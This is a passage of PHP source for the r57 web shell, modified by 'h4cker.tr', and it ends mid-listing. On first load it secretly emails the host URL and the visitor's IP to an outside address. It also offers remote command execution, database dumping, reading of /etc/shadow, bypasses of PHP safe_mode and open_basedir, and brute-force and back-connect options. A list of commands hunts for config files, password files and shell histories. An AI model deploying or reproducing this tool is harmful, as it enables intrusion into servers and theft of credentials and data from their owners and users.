edited by h4cker.tr'; if (@version_compare(@phpversion(), '4.1.0') == - 1) { $_POST = & $HTTP_POST_VARS; $_GET = & $HTTP_GET_VARS; $_SERVER = & $HTTP_SERVER_VARS; $_COOKIE = & $HTTP_COOKIE_VARS; } if(!isset($_SESSION['trimite'])){ $url=$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'].'
User IP: '.$_SERVER['REMOTE_ADDR'].(isset($_SERVER['HTTP_X_FORWARDED_FOR'])?'('.$_SERVER['HTTP_X_FORWARDED_FOR'].')':''); @mail("x6cx6fx67@outlook.com","Oss_Shell_2.0",$url); $_SESSION['trimite']=true; } if (@get_magic_quotes_gpc()) { foreach ($_POST as $k => $v) { $_POST[$k] = stripslashes($v); } foreach ($_COOKIE as $k => $v) { $_COOKIE[$k] = stripslashes($v); } } if ($auth == 1) { if (!isset($_SERVER['PHP_AUTH_USER']) || md5($_SERVER['PHP_AUTH_USER']) !== $name || md5($_SERVER['PHP_AUTH_PW']) !== $pass) { header('WWW-Authenticate: Basic realm="HELLO!"'); header('HTTP/1.0 401 Unauthorized'); exit("Access Denied"); } } $head = ' r57 bypass shell | modified by h4cker.tr '; class zipfile { var $datasec = array(); var $ctrl_dir = array(); var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00"; var $old_offset = 0; function unix2DosTime($unixtime = 0) { $timearray = ($unixtime == 0) ? getdate() : getdate($unixtime); if ($timearray['year'] < 1980) { $timearray['year'] = 1980; $timearray['mon'] = 1; $timearray['mday'] = 1; $timearray['hours'] = 0; $timearray['minutes'] = 0; $timearray['seconds'] = 0; } return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) | ($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1); } function addFile($data, $name, $time = 0) { $name = str_replace('\\', '/', $name); $dtime = dechex($this->unix2DosTime($time)); $hexdtime = '\x' . $dtime[6] . $dtime[7] . '\x' . $dtime[4] . $dtime[5] . '\x' . $dtime[2] . $dtime[3] . '\x' . $dtime[0] . $dtime[1]; eval('$hexdtime = "' . $hexdtime . '"; '); $fr = "\x50\x4b\x03\x04"; $fr.= "\x14\x00"; $fr.= "\x00\x00"; $fr.= "\x08\x00"; $fr.= $hexdtime; $unc_len = strlen($data); $crc = crc32($data); $zdata = gzcompress($data); $zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2); $c_len = strlen($zdata); $fr.= pack('V', $crc); $fr.= pack('V', $c_len); $fr.= pack('V', $unc_len); $fr.= pack('v', strlen($name)); $fr.= pack('v', 0); $fr.= $name; $fr.= $zdata; $this->datasec[] = $fr; $cdrec = "\x50\x4b\x01\x02"; $cdrec.= "\x00\x00"; $cdrec.= "\x14\x00"; $cdrec.= "\x00\x00"; $cdrec.= "\x08\x00"; $cdrec.= $hexdtime; $cdrec.= pack('V', $crc); $cdrec.= pack('V', $c_len); $cdrec.= pack('V', $unc_len); $cdrec.= pack('v', strlen($name)); $cdrec.= pack('v', 0); $cdrec.= pack('v', 0); $cdrec.= pack('v', 0); $cdrec.= pack('v', 0); $cdrec.= pack('V', 32); $cdrec.= pack('V', $this->old_offset); $this->old_offset+= strlen($fr); $cdrec.= $name; $this->ctrl_dir[] = $cdrec; } function file() { $data = implode('', $this->datasec); $ctrldir = implode('', $this->ctrl_dir); return $data . $ctrldir . $this->eof_ctrl_dir . pack('v', sizeof($this->ctrl_dir)) . pack('v', sizeof($this->ctrl_dir)) . pack('V', strlen($ctrldir)) . pack('V', strlen($data)) . "\x00\x00"; } } function compress(&$filename, &$filedump, $compress) { global $content_encoding; global $mime_type; if ($compress == 'bzip' && @function_exists('bzcompress')) { $filename.= '.bz2'; $mime_type = 'application/x-bzip2'; $filedump = bzcompress($filedump); } else if ($compress == 'gzip' && @function_exists('gzencode')) { $filename.= '.gz'; $content_encoding = 'x-gzip'; $mime_type = 'application/x-gzip'; $filedump = gzencode($filedump); } else if ($compress == 'zip' && @function_exists('gzcompress')) { $filename.= '.zip'; $mime_type = 'application/zip'; $zipfile = new zipfile(); $zipfile->addFile($filedump, substr($filename, 0, -4)); $filedump = $zipfile->file(); } else { $mime_type = 'application/octet-stream'; } } function moreread($temp) { global $lang, $language; $str = ''; if (@function_exists('fopen') && @function_exists('feof') && @function_exists('fgets') && @function_exists('fclose')) { $ffile = @fopen($temp, "r"); while (!@feof($ffile)) { $str.= @fgets($ffile); } fclose($ffile); } elseif (@function_exists('fopen') && @function_exists('fread') && @function_exists('fclose') && @function_exists('filesize')) { $ffile = @fopen($temp, "r"); $str = @fread($ffile, @filesize($temp)); @fclose($ffile); } elseif (@function_exists('file')) { $ffiles = @file($temp); foreach ($ffiles as $ffile) { $str.= $ffile; } } elseif (@function_exists('file_get_contents')) { $str = @file_get_contents($temp); } elseif (@function_exists('readfile')) { $str = @readfile($temp); } else { echo $lang[$language . '_text56']; } return $str; } function readzlib($filename, $temp = '') { global $lang, $language; $str = ''; if (!$temp) { $temp = tempnam(@getcwd(), "copytemp"); }; if (@copy("compress.zlib://" . $filename, $temp)) { $str = moreread($temp); } else echo $lang[$language . '_text119']; @unlink($temp); return $str; } function mailattach($to, $from, $subj, $attach) { $headers = "From: $from\r\n"; $headers.= "MIME-Version: 1.0\r\n"; $headers.= "Content-Type: " . $attach['type']; $headers.= "; name=\"" . $attach['name'] . "\"\r\n"; $headers.= "Content-Transfer-Encoding: base64\r\n\r\n"; $headers.= chunk_split(base64_encode($attach['content'])) . "\r\n"; if (mail($to, $subj, "", $headers)) { return 1; } return 0; } class my_sql { var $host = 'localhost'; var $port = ''; var $user = ''; var $pass = ''; var $base = ''; var $db = ''; var $connection; var $res; var $error; var $rows; var $columns; var $num_rows; var $num_fields; var $dump; function connect() { switch ($this->db) { case 'MySQL': if (empty($this->port)) { $this->port = '3306'; } if (!@function_exists('mysql_connect')) return 0; $this->connection = @mysql_connect($this->host . ':' . $this->port, $this->user, $this->pass); if (is_resource($this->connection)) return 1; break; case 'MSSQL': if (empty($this->port)) { $this->port = '1433'; } if (!@function_exists('mssql_connect')) return 0; $this->connection = @mssql_connect($this->host . ',' . $this->port, $this->user, $this->pass); if ($this->connection) return 1; break; case 'PostgreSQL': if (empty($this->port)) { $this->port = '5432'; } $str = "host='" . $this->host . "' port='" . $this->port . "' user='" . $this->user . "' password='" . $this->pass . "' dbname='" . $this->base . "'"; if (!@function_exists('pg_connect')) return 0; $this->connection = @pg_connect($str); if (is_resource($this->connection)) return 1; break; case 'Oracle': if (!@function_exists('ocilogon')) return 0; $this->connection = @ocilogon($this->user, $this->pass, $this->base); if (is_resource($this->connection)) return 1; break; } return 0; } function select_db() { switch ($this->db) { case 'MySQL': if (@mysql_select_db($this->base, $this->connection)) return 1; break; case 'MSSQL': if (@mssql_select_db($this->base, $this->connection)) return 1; break; case 'PostgreSQL': return 1; break; case 'Oracle': return 1; break; } return 0; } function query($query) { $this->res = $this->error = ''; switch ($this->db) { case 'MySQL': if (false === ($this->res = @mysql_query('/*' . chr(0) . '*/' . $query, $this->connection))) { $this->error = @mysql_error($this->connection); return 0; } else if (is_resource($this->res)) { return 1; } return 2; break; case 'MSSQL': if (false === ($this->res = @mssql_query($query, $this->connection))) { $this->error = 'Query error'; return 0; } else if (@mssql_num_rows($this->res) > 0) { return 1; } return 2; break; case 'PostgreSQL': if (false === ($this->res = @pg_query($this->connection, $query))) { $this->error = @pg_last_error($this->connection); return 0; } else if (@pg_num_rows($this->res) > 0) { return 1; } return 2; break; case 'Oracle': if (false === ($this->res = @ociparse($this->connection, $query))) { $this->error = 'Query parse error'; } else { if (@ociexecute($this->res)) { if (@ocirowcount($this->res) != 0) return 2; return 1; } $error = @ocierror(); $this->error = $error['message']; } break; } return 0; } function get_result() { $this->rows = array(); $this->columns = array(); $this->num_rows = $this->num_fields = 0; switch ($this->db) { case 'MySQL': $this->num_rows = @mysql_num_rows($this->res); $this->num_fields = @mysql_num_fields($this->res); while (false !== ($this->rows[] = @mysql_fetch_assoc($this->res))); @mysql_free_result($this->res); if ($this->num_rows) { $this->columns = @array_keys($this->rows[0]); return 1; } break; case 'MSSQL': $this->num_rows = @mssql_num_rows($this->res); $this->num_fields = @mssql_num_fields($this->res); while (false !== ($this->rows[] = @mssql_fetch_assoc($this->res))); @mssql_free_result($this->res); if ($this->num_rows) { $this->columns = @array_keys($this->rows[0]); return 1; }; break; case 'PostgreSQL': $this->num_rows = @pg_num_rows($this->res); $this->num_fields = @pg_num_fields($this->res); while (false !== ($this->rows[] = @pg_fetch_assoc($this->res))); @pg_free_result($this->res); if ($this->num_rows) { $this->columns = @array_keys($this->rows[0]); return 1; } break; case 'Oracle': $this->num_fields = @ocinumcols($this->res); while (false !== ($this->rows[] = @oci_fetch_assoc($this->res))) $this->num_rows++; @ocifreestatement($this->res); if ($this->num_rows) { $this->columns = @array_keys($this->rows[0]); return 1; } break; } return 0; } function dump($table) { if (empty($table)) return 0; $this->dump = array(); $this->dump[0] = '##'; $this->dump[1] = '## --------------------------------------- '; $this->dump[2] = '## Created: ' . date("d/m/Y H:i:s"); $this->dump[3] = '## Database: ' . $this->base; $this->dump[4] = '## Table: ' . $table; $this->dump[5] = '## --------------------------------------- '; switch ($this->db) { case 'MySQL': $this->dump[0] = '## MySQL dump'; if ($this->query('/*' . chr(0) . '*/ SHOW CREATE TABLE `' . $table . '`') != 1) return 0; if (!$this->get_result()) return 0; $this->dump[] = $this->rows[0]['Create Table']; $this->dump[] = '## --------------------------------------- '; if ($this->query('/*' . chr(0) . '*/ SELECT * FROM `' . $table . '`') != 1) return 0; if (!$this->get_result()) return 0; for ($i = 0; $i < $this->num_rows; $i++) { foreach ($this->rows[$i] as $k => $v) { $this->rows[$i][$k] = @mysql_real_escape_string($v); } $this->dump[] = 'INSERT INTO `' . $table . '` (`' . @implode("`, `", $this->columns) . '`) VALUES (\'' . @implode("', '", $this->rows[$i]) . '\'); '; } break; case 'MSSQL': $this->dump[0] = '## MSSQL dump'; if ($this->query('SELECT * FROM ' . $table) != 1) return 0; if (!$this->get_result()) return 0; for ($i = 0; $i < $this->num_rows; $i++) { foreach ($this->rows[$i] as $k => $v) { $this->rows[$i][$k] = @addslashes($v); } $this->dump[] = 'INSERT INTO ' . $table . ' (' . @implode(", ", $this->columns) . ') VALUES (\'' . @implode("', '", $this->rows[$i]) . '\'); '; } break; case 'PostgreSQL': $this->dump[0] = '## PostgreSQL dump'; if ($this->query('SELECT * FROM ' . $table) != 1) return 0; if (!$this->get_result()) return 0; for ($i = 0; $i < $this->num_rows; $i++) { foreach ($this->rows[$i] as $k => $v) { $this->rows[$i][$k] = @addslashes($v); } $this->dump[] = 'INSERT INTO ' . $table . ' (' . @implode(", ", $this->columns) . ') VALUES (\'' . @implode("', '", $this->rows[$i]) . '\'); '; } break; case 'Oracle': $this->dump[0] = '## ORACLE dump'; $this->dump[] = '## under construction'; break; default: return 0; break; } return 1; } function close() { switch ($this->db) { case 'MySQL': @mysql_close($this->connection); break; case 'MSSQL': @mssql_close($this->connection); break; case 'PostgreSQL': @pg_close($this->connection); break; case 'Oracle': @oci_close($this->connection); break; } } function affected_rows() { switch ($this->db) { case 'MySQL': return @mysql_affected_rows($this->res); break; case 'MSSQL': return @mssql_affected_rows($this->res); break; case 'PostgreSQL': return @pg_affected_rows($this->res); break; case 'Oracle': return @ocirowcount($this->res); break; default: return 0; break; } } } if (!empty($_POST['cmd']) && $_POST['cmd'] == "download_file" && !empty($_POST['d_name'])) { if ($file = @fopen($_POST['d_name'], "r")) { $filedump = @fread($file, @filesize($_POST['d_name'])); @fclose($file); } else if ($file = readzlib($_POST['d_name'])) { $filedump = $file; } else { err(1, $_POST['d_name']); $_POST['cmd'] = ""; } if (isset($_POST['cmd'])) { @ob_clean(); $filename = @basename($_POST['d_name']); $content_encoding = $mime_type = ''; compress($filename, $filedump, $_POST['compress']); if (!empty($content_encoding)) { header('Content-Encoding: ' . $content_encoding); } header("Content-type: " . $mime_type); header("Content-disposition: attachment; filename=\"" . $filename . "\"; "); echo $filedump; exit(); } } if (isset($_GET['phpinfo'])) { echo @phpinfo(); echo "
[ BACK ]
"; die(); } if (!empty($_POST['cmd']) && $_POST['cmd'] == "db_query") { echo $head; $sql = new my_sql(); $sql->db = $_POST['db']; $sql->host = $_POST['db_server']; $sql->port = $_POST['db_port']; $sql->user = $_POST['mysql_l']; $sql->pass = $_POST['mysql_p']; $sql->base = $_POST['mysql_db']; $querys = @explode('; ', $_POST['db_query']); echo ''; if (!$sql->connect()) echo "
Can't connect to SQL server
"; else { if (!empty($sql->base) && !$sql->select_db()) echo "
Can't select database
"; else { foreach ($querys as $num => $query) { if (strlen($query) > 5) { echo "Query#" . $num . " : " . htmlspecialchars($query, ENT_QUOTES) . "
"; switch ($sql->query($query)) { case '0': echo "
Error : " . $sql->error . "
"; break; case '1': if ($sql->get_result()) { echo ""; foreach ($sql->columns as $k => $v) $sql->columns[$k] = htmlspecialchars($v, ENT_QUOTES); $keys = @implode("  "; for ($i = 0; $i < $sql->num_rows; $i++) { foreach ($sql->rows[$i] as $k => $v) $sql->rows[$i][$k] = htmlspecialchars($v, ENT_QUOTES); $values = @implode("  '; } echo "
  ", $sql->columns); echo "
  " . $keys . " 
  ", $sql->rows[$i]); echo '
  ' . $values . ' 
"; } break; case '2': $ar = $sql->affected_rows() ? ($sql->affected_rows()) : ('0'); echo "
affected rows : " . $ar . "

"; break; } } } } } echo "
"; echo in('hidden', 'db', 0, $_POST['db']); echo in('hidden', 'db_server', 0, $_POST['db_server']); echo in('hidden', 'db_port', 0, $_POST['db_port']); echo in('hidden', 'mysql_l', 0, $_POST['mysql_l']); echo in('hidden', 'mysql_p', 0, $_POST['mysql_p']); echo in('hidden', 'mysql_db', 0, $_POST['mysql_db']); echo in('hidden', 'cmd', 0, 'db_query'); echo "
"; echo "Base: base . "\">
"; echo "

"; echo "
"; echo "
[ BACK ]
"; die(); } if (isset($_GET['delete'])) { @unlink('index.php'); } if (isset($_GET['tmp'])) { @unlink("/tmp/bdpl"); @unlink("/tmp/back"); @unlink("/tmp/bd"); @unlink("/tmp/bd.c"); @unlink("/tmp/dp"); @unlink("/tmp/dpc"); @unlink("/tmp/dpc.c"); @unlink("/tmp/prxpl"); @unlink("/tmp/grep.txt"); } if (isset($_GET['phpini'])) { echo $head; function U_value($value) { if ($value == '') return 'no value'; if (@is_bool($value)) return $value ? 'TRUE' : 'FALSE'; if ($value === null) return 'NULL'; if (@is_object($value)) $value = (array)$value; if (@is_array($value)) { @ob_start(); print_r($value); $value = @ob_get_contents(); @ob_end_clean(); } return U_wordwrap((string)$value); } function U_wordwrap($str) { $str = @wordwrap(@htmlspecialchars($str), 100, '', true); return @preg_replace('!(&[^; ]*)([^; ]*; )!', '$1$2', $str); } if (@function_exists('ini_get_all')) { $r = ''; echo '', ''; foreach (@ini_get_all() as $key => $value) { $r.= ''; } echo $r; echo '
Local Value
Master Value
' . ws(3) . '' . $key . '
' . U_value($value['local_value']) . '
' . U_value($value['global_value']) . '
'; } echo "
[ BACK ]
"; die(); } if (isset($_GET['cpu'])) { echo $head; echo '
'; $cpuf = @file("cpuinfo"); if ($cpuf) { $c = @sizeof($cpuf); for ($i = 0; $i < $c; $i++) { $info = @explode(":", $cpuf[$i]); if ($info[1] == "") { $info[1] = "---"; } $r.= ''; } echo $r; } else { echo ''; } echo '
' . ws(3) . '' . trim($info[0]) . '
' . trim($info[1]) . '
' . ws(3) . '
'; echo "
[ BACK ]
"; die(); } if (isset($_GET['mem'])) { echo $head; echo '
'; $memf = @file("meminfo"); if ($memf) { $c = sizeof($memf); for ($i = 0; $i < $c; $i++) { $info = explode(":", $memf[$i]); if ($info[1] == "") { $info[1] = "---"; } $r.= ''; } echo $r; } else { echo ''; } echo '
' . ws(3) . '' . trim($info[0]) . '
' . trim($info[1]) . '
' . ws(3) . '
'; echo "
[ green ]
"; die(); } if (isset($_GET['dmesg(8)'])) { $_POST['cmd'] = 'dmesg(8)'; } if (isset($_GET['free'])) { $_POST['cmd'] = 'free'; } if (isset($_GET['vmstat'])) { $_POST['cmd'] = 'vmstat'; } if (isset($_GET['lspci'])) { $_POST['cmd'] = 'lspci'; } if (isset($_GET['lsdev'])) { $_POST['cmd'] = 'lsdev'; } if (isset($_GET['procinfo'])) { $_POST['cmd'] = 'cat /proc/cpuinfo'; } if (isset($_GET['version'])) { $_POST['cmd'] = 'cat /proc/version'; } if (isset($_GET['interrupts'])) { $_POST['cmd'] = 'cat /proc/interrupts'; } if (isset($_GET['realise1'])) { $_POST['cmd'] = 'cat /etc/*realise'; } if (isset($_GET['service'])) { $_POST['cmd'] = 'service --status-all'; } if (isset($_GET['ifconfig'])) { $_POST['cmd'] = 'ifconfig'; } if (isset($_GET['w'])) { $_POST['cmd'] = 'w'; } if (isset($_GET['who'])) { $_POST['cmd'] = 'who'; } if (isset($_GET['uptime'])) { $_POST['cmd'] = 'uptime'; } if (isset($_GET['last'])) { $_POST['cmd'] = 'last -n 10'; } if (isset($_GET['psaux'])) { $_POST['cmd'] = 'ps -aux'; } if (isset($_GET['netstat'])) { $_POST['cmd'] = 'netstat -a'; } if (isset($_GET['lsattr'])) { $_POST['cmd'] = 'lsattr -va'; } if (isset($_GET['syslog'])) { $_POST['cmd'] = 'edit_file'; $_POST['e_name'] = '/etc/syslog.conf'; } if (isset($_GET['fstab'])) { $_POST['cmd'] = 'edit_file'; $_POST['e_name'] = '/etc/fstab'; } if (isset($_GET['fdisk'])) { $_POST['cmd'] = 'fdisk -l'; } if (isset($_GET['df'])) { $_POST['cmd'] = 'df -h'; } if (isset($_GET['realise2'])) { $_POST['cmd'] = 'edit_file'; $_POST['e_name'] = '/etc/issue.net'; } if (isset($_GET['hosts'])) { $_POST['cmd'] = 'edit_file'; $_POST['e_name'] = '/etc/hosts'; } if (isset($_GET['resolv'])) { $_POST['cmd'] = 'edit_file'; $_POST['e_name'] = '/etc/resolv.conf'; } if (isset($_GET['systeminfo'])) { $_POST['cmd'] = 'systeminfo'; } if (isset($_GET['shadow'])) { $_POST['cmd'] = 'edit_file'; $_POST['e_name'] = '/etc/shadow'; } if (isset($_GET['passwd'])) { $_POST['cmd'] = 'edit_file'; $_POST['e_name'] = '/etc/passwd'; } $lang = array('tr_text1' => 'Komut Uygula', 'tr_text2' => 'Server uzerinde komut calistir ', 'tr_text3' => 'Komut istemi ', 'tr_text4' => 'Calisma Dizini ', 'tr_text5' => 'Servere Dosya Upload Et', 'tr_text6' => 'Yerel Dosya ', 'tr_text7' => 'Dizin Veya Dosya Bul ', 'tr_text8' => 'Sec', 'tr_butt1' => 'Uygula', 'tr_butt2' => 'Yukle', 'tr_text9' => 'Porta baglan /bin/bash', 'tr_text10' => 'Port', 'tr_text11' => 'Sifre Giris', 'tr_butt3' => 'Baglan', 'tr_text12' => 'Back-Connect', 'tr_text13' => 'IP', 'tr_text14' => 'Port', 'tr_butt4' => 'Baglan', 'tr_text15' => 'Uzaktan servere dosya yukle', 'tr_text16' => 'ile', 'tr_text17' => 'Uzak Dosya', 'tr_text18' => 'Yerel Dosya', 'tr_text19' => 'Exploits', 'tr_text20' => 'Kullan', 'tr_text21' => '  Yeni ad', 'tr_text22' => 'datapipe', 'tr_text23' => 'Yerel Port', 'tr_text24' => 'Uzak Host', 'tr_text25' => 'Uzak Port', 'tr_text26' => 'Kullan', 'tr_butt5' => 'Iste', 'tr_text28' => 'Guvenlik Modunda Calis', 'tr_text29' => 'Giris Yok ', 'tr_butt6' => 'Degistir', 'tr_text30' => 'Cat file', 'tr_butt7' => 'Goster', 'tr_text31' => 'Dosya Bulunamadi', 'tr_text32' => 'PHP Kod Degerlendir ', 'tr_text33' => 'Test bypass open_basedir with cURL functions(PHP <= 4.4.2, 5.1.4)', 'tr_butt8' => 'Testet', 'tr_text34' => 'Includes fonksiyonu ile Guvenlik modunu atlamayi test et.', 'tr_text35' => 'Mysql da ki yukleme dosyasi ile Guvenlik modunu atlamayi test et.', 'tr_text36' => 'Database[VeriTabani]', 'tr_text37' => 'Kullanici', 'tr_text38' => 'Sifre', 'tr_text39' => 'Tablo', 'tr_text40' => 'Dump database table[DB Tablosu dok]', 'tr_butt9' => 'Dump', 'tr_text41' => 'DB dosyalarini kaydet.[Dump filed]', 'tr_text42' => 'Dosya Duzenle ', 'tr_text43' => 'Dosya Duzenlemek icin', 'tr_butt10' => 'Kaydet', 'tr_text44' => 'Dosya degistirilmiyor ! YASAK ! Guvenlik Modu izin Vermiyor', 'tr_text45' => 'Dosya Kaydedildi', 'tr_text46' => 'PHP info Goster()', 'tr_text47' => 'Php.ini dosyasinda ki degiskenleri goster', 'tr_text48' => 'Temp dosylarini sil', 'tr_butt11' => 'Dosya Duzenle', 'tr_text49' => 'Server dan bu scripti sil', 'tr_text50' => 'CPU bilgisini incele', 'tr_text51' => 'Memory[hafiza] bilgisini incele]', 'tr_text52' => 'Metni Bul ', 'tr_text53' => 'Klasor Bul', 'tr_text54' => 'Dosyalarda ki Metni Bul', 'tr_butt12' => 'Bul', 'tr_text55' => 'Dosya Bul ', 'tr_text56' => 'Bulunmadi :( KeyCoder :)', 'tr_text57' => 'Olustur/Sil Dosya/Dizin ', 'tr_text58' => 'isim', 'tr_text59' => 'Dosya', 'tr_text60' => 'Dizin', 'tr_butt13' => 'Olustur/Sil', 'tr_text61' => 'Dosya Olustur', 'tr_text62' => 'Dizin Olustur', 'tr_text63' => 'Dosya Sil', 'tr_text64' => 'Dizin Sil', 'tr_text65' => 'Olustur', 'tr_text66' => 'Sil', 'tr_text67' => 'Chown/Chgrp/Chmod', 'tr_text68' => 'Uygula', 'tr_text69' => 'param1', 'tr_text70' => 'param2', 'tr_text71' => "Second commands param is:\r\n- for CHOWN - name of new owner or UID\r\n- for CHGRP - group name or GID\r\n- for CHMOD - 0777, 0755...", 'tr_text72' => 'Metin Bul', 'tr_text73' => 'Klasor Bul', 'tr_text74' => 'Dosya Bul', 'tr_text75' => '* you can use regexp', 'tr_text76' => 'Metin Ara Dosyalarin icinde Arama Yoluyla', 'tr_text80' => 'Cesit', 'tr_text81' => 'Net', 'tr_text82' => 'Databases', 'tr_text83' => 'SQL Sorgusu Yap', 'tr_text84' => 'SQL Sorgusu', 'tr_text85' => 'Test bypass safe_mode with commands execute via MSSQL server', 'tr_text86' => 'Download files from server', 'tr_butt14' => 'Download', 'tr_text87' => 'Download files from remote ftp-server', 'tr_text88' => 'server:port', 'tr_text89' => 'File on ftp', 'tr_text90' => 'Transfer mode', 'tr_text91' => 'Archivation', 'tr_text92' => 'without arch.', 'tr_text93' => 'FTP', 'tr_text94' => 'FTP-bruteforce', 'tr_text95' => 'Users list', 'tr_text96' => 'Can\'t get users list', 'tr_text97' => 'checked: ', 'tr_text98' => 'success: ', 'tr_text99' => '/etc/passwd', 'tr_text100' => 'Send file to remote ftp server', 'tr_text101' => 'Use reverse (user -> resu)', 'tr_text102' => 'Mail', 'tr_text103' => 'Send email', 'tr_text104' => 'Send file to email', 'tr_text105' => 'To', 'tr_text106' => 'From', 'tr_text107' => 'Subj', 'tr_butt15' => 'Send', 'tr_text108' => 'Mail', 'tr_text109' => 'Hide', 'tr_text110' => 'Show', 'tr_text111' => 'SQL-Server : Port', 'tr_text112' => 'Test bypass safe_mode with function mb_send_mail (PHP <= 4.0-4.2.2, 5.x)', 'tr_text113' => 'Test bypass safe_mode, view dir list via imap_list (PHP <= 5.1.2)', 'tr_text114' => 'Test bypass safe_mode, view file contest via imap_body (PHP <= 5.1.2)', 'tr_text115' => 'Test bypass safe_mode, copy file via copy[compress.zlib://] (PHP <= 4.4.2, 5.1.2)', 'tr_text116' => 'Copy from', 'tr_text117' => 'to', 'tr_text118' => 'File copied', 'tr_text119' => 'Cant copy file', 'tr_text120' => 'Test bypass safe_mode via ini_restore (PHP <= 4.4.4, 5.1.6) by NST', 'tr_text121' => 'Test bypass open_basedir, view dir list via fopen (PHP v4.4.0 memory leak) by NST', 'tr_text122' => 'Test bypass open_basedir, view dir list via glob (PHP <= 5.2.x)', 'tr_text123' => 'Test bypass open_basedir, read *.bzip file via [compress.bzip2://] (PHP <= 5.2.1)', 'tr_text124' => 'Test bypass open_basedir, add data to file via error_log[php://] (PHP <= 5.1.4, 4.4.2)', 'tr_text125' => 'Data', 'tr_text126' => 'Test bypass open_basedir, create file via session_save_path[NULL-byte] (PHP <= 5.2.0)', 'tr_text127' => 'Test bypass open_basedir, add data to file via readfile[php://] (PHP <= 5.2.1, 4.4.4)', 'tr_text128' => 'Modify/Access date(touch)', 'tr_text129' => 'Test bypass open_basedir, create file via fopen[srpath://] (PHP v5.2.0)', 'tr_text130' => 'Test bypass open_basedir, read *.zip file via [zip://] (PHP <= 5.2.1)', 'tr_text131' => 'Test bypass open_basedir, view file contest via symlink() (PHP <= 5.2.1)', 'tr_text132' => 'Test bypass open_basedir, view dir list via symlink() (PHP <= 5.2.1)', 'tr_text133' => '', 'tr_text134' => 'Database-bruteforce', 'tr_text135' => 'Dictionary', 'tr_text136' => 'Creating evil symlink', 'tr_text137' => 'Useful', 'tr_text138' => 'Dangerous', 'tr_text139' => 'Mail Bomber', 'tr_text140' => 'DoS', 'tr_text141' => 'Danger! Web-daemon crash possible.', 'tr_err0' => 'Error! Can\'t write in file ', 'tr_err1' => 'Error! Can\'t read file ', 'tr_err2' => 'Error! Can\'t create ', 'tr_err3' => 'Error! Can\'t connect to ftp', 'tr_err4' => 'Error! Can\'t login on ftp server', 'tr_err5' => 'Error! Can\'t change dir on ftp', 'tr_err6' => 'Error! Can\'t sent mail', 'tr_err7' => 'Mail send',); $aliases = array('----------------------------------locate' => '', 'locate httpd.conf files >> /tmp/grep.txt; cat /tmp/grep.txt' => 'locate httpd.conf >> /tmp/grep.txt; cat /tmp/grep.txt', 'locate vhosts.conf files >> /tmp/grep.txt; cat /tmp/grep.txt' => 'locate vhosts.conf >> /tmp/grep.txt; cat /tmp/grep.txt', 'locate proftpd.conf files >> /tmp/grep.txt; cat /tmp/grep.txt' => 'locate proftpd.conf >> /tmp/grep.txt; cat /tmp/grep.txt', 'locate psybnc.conf >> /tmp/grep.txt; cat /tmp/grep.txt' => 'locate psybnc.conf >> /tmp/grep.txt; cat /tmp/grep.txt', 'locate my.conf files >> /tmp/grep.txt; cat /tmp/grep.txt' => 'locate my.conf >> /tmp/grep.txt; cat /tmp/grep.txt', 'locate admin.php files >> /tmp/grep.txt; cat /tmp/grep.txt' => 'locate admin.php >> /tmp/grep.txt; cat /tmp/grep.txt', 'locate cfg.php files >> /tmp/grep.txt; cat /tmp/grep.txt' => 'locate cfg.php >> /tmp/grep.txt; cat /tmp/grep.txt', 'locate conf.php files >> /tmp/grep.txt; cat /tmp/grep.txt' => 'locate conf.php >> /tmp/grep.txt; cat /tmp/grep.txt', 'locate config.dat files >> /tmp/grep.txt; cat /tmp/grep.txt' => 'locate config.dat >> /tmp/grep.txt; cat /tmp/grep.txt', 'locate config.php files >> /tmp/grep.txt; cat /tmp/grep.txt' => 'locate config.php >> /tmp/grep.txt; cat /tmp/grep.txt', 'locate config.inc files >> /tmp/grep.txt; cat /tmp/grep.txt' => 'locate config.inc >> /tmp/grep.txt; cat /tmp/grep.txt', 'locate config.inc.php files >> /tmp/grep.txt; cat /tmp/grep.txt' => 'locate config.inc.php >> /tmp/grep.txt; cat /tmp/grep.txt', 'locate config.default.php files >> /tmp/grep.txt; cat /tmp/grep.txt' => 'locate config.default.php >> /tmp/grep.txt; cat /tmp/grep.txt', 'locate .conf files >> /tmp/grep.txt; cat /tmp/grep.txt' => 'locate ".conf" >> /tmp/grep.txt; cat /tmp/grep.txt', 'locate .pwd files >> /tmp/grep.txt; cat /tmp/grep.txt' => 'locate ".pwd" >> /tmp/grep.txt; cat /tmp/grep.txt', 'locate .sql files >> /tmp/grep.txt; cat /tmp/grep.txt' => 'locate ".sql" >> /tmp/grep.txt; cat /tmp/grep.txt', 'locate .htpasswd files >> /tmp/grep.txt; cat /tmp/grep.txt' => 'locate ".htpasswd" >> /tmp/grep.txt; cat /tmp/grep.txt', 'locate .bash_history files >> /tmp/grep.txt; cat /tmp/grep.txt' => 'locate ".bash_history" >> /tmp/grep.txt; cat /tmp/grep.txt', 'locate .mysql_history files >> /tmp/grep.txt; cat /tmp/grep.txt' => 'locate ".mysql_history" >> /tmp/grep.txt; cat /tmp/grep.txt', 'locate backup files >> /tmp/grep.txt; cat /tmp/grep.txt' => 'locate backup >> /tmp/grep.txt; cat /tmp/grep.txt', 'locate dump files >> /tmp/grep.txt; cat /tmp/grep.txt' => 'locate dump >> /tmp/grep.txt; cat /tmp/grep.txt', 'locate priv files >> /tmp/grep.txt; cat /tmp/grep.txt' => 'locate priv >> /tmp/grep.txt; cat /tmp/grep.txt', '----------------------------------tar' => '', 'tar -czvf all.tgz -T /tmp/grep.txt' => 'tar -czvf all.tgz -T /tmp/grep.txt', '----------------------------------1' => '', 'locate access_log files >> /tmp/grep.txt; cat /tmp/grep.txt' => 'locate access_log >> /tmp/grep.txt; cat /tmp/grep.txt', 'locate error_log files >> /tmp/grep.txt; cat /tmp/grep.txt' => 'locate error_log >> /tmp/grep.txt; cat /tmp/grep.txt', 'locate access.log files >> /tmp/grep.txt; cat /tmp/grep.txt' => 'locate access.log >> /tmp/grep.txt; cat /tmp/grep.txt', 'locate error.log files >> /tmp/grep.txt; cat /tmp/grep.txt' => 'locate error.log >> /tmp/grep.txt; cat /tmp/grep.txt', 'locate ".log" files >> /tmp/grep.txt; cat /tmp/grep.txt' => 'locate ".log" >> /tmp/grep.txt; cat /tmp/grep.txt', '----------------------------------2' => '', 'cat /var/log/httpd/access_log | grep pass >> /tmp/grep.txt; cat 